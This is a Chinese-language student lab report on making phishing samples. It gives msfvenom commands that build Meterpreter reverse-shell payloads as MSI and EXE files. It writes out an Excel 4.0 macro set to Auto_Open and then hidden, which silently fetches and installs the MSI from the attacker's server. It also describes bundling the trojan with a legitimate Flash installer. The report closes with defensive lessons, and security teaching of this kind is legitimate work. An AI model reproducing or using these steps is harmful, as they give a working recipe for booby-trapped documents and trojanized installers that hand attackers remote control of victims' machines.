一、实验目的
学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。
二、实验任务
(1)制作恶意的excel文件
(2)将正常的软件和恶意木马进行捆绑打包
三、实验过程和实验结果
(一)excel宏
1. msf生成恶意的msi文件
msfvenom -p windows/meterpreter/reverse_tcp lhsot=192.168.118.129 lport=4444 -f msi -o diaoyexl.msi
2.msf建立监听
3. python在具有恶意的msi的文件夹下开启http服务
4. 开始制作excel
(1)在文件中加点内容,让受害者更容易上钩
(2)选择插入宏表
(3)第一行输入 =EXEC("msiexec /q /i http://192.168.118.129/diaoyexl.msi"),调用服务器上的msi;
第二行输入 =HALT(),标识Excel 4.0宏结束;
在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车,然后隐藏宏。
(4)另存为启用宏的工作表,运行后启用宏
5.输入shell,成功上线。
(二)常规软件捆绑远控木马进行钓鱼
1. 制作msf木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.129 LPORT=4444 -f exe -o flash.exe
2. 把木马和正常的flash 进行压缩,放在一起用winrar添加到压缩文件
3. 启动msf进行监听
4. 把做好的恶意flash放到win7虚拟机中运行,点击安装后就会上线了。
5.成功执行命令
四、实验总结
实验原理: 本次实验主要基于钓鱼攻击的原理,通过制作恶意的Excel文件和软件捆绑木马,诱使受害者执行恶意代码,从而实现对受害者计算机的远程控制。实验中使用了Metasploit框架生成恶意载荷,并通过宏和软件捆绑的方式将恶意代码植入到正常文件
通过本次实验,我掌握了msfvenom生成恶意载荷的方法、制作带有恶意宏的Excel文件、将恶意载荷与正常软件捆绑,制作钓鱼样本、使用Metasploit进行监听和远程控制;学习了钓鱼攻击的原理和危害、宏病毒的工作机制、软件捆绑木马的制作和传播方式。
在实验过程中,碰到了以下问题:
1.在把木马和正常的flash 进行压缩后,在win7总是显示找不到该文件,经多次询问同学后,终于解决该问题。
2. 启动msf进行监听时的监听端口与前面不一致,多次检查后,找出问题所在并修改。
本次实验让我了解到钓鱼攻击的原理和防范措施,我们要提高网络安全意识,不轻易打开来源不明的文件和软件,防止受到钓鱼攻击;同时也要加强网络安全防护,定期更新操作系统和软件,防止恶意代码的植入。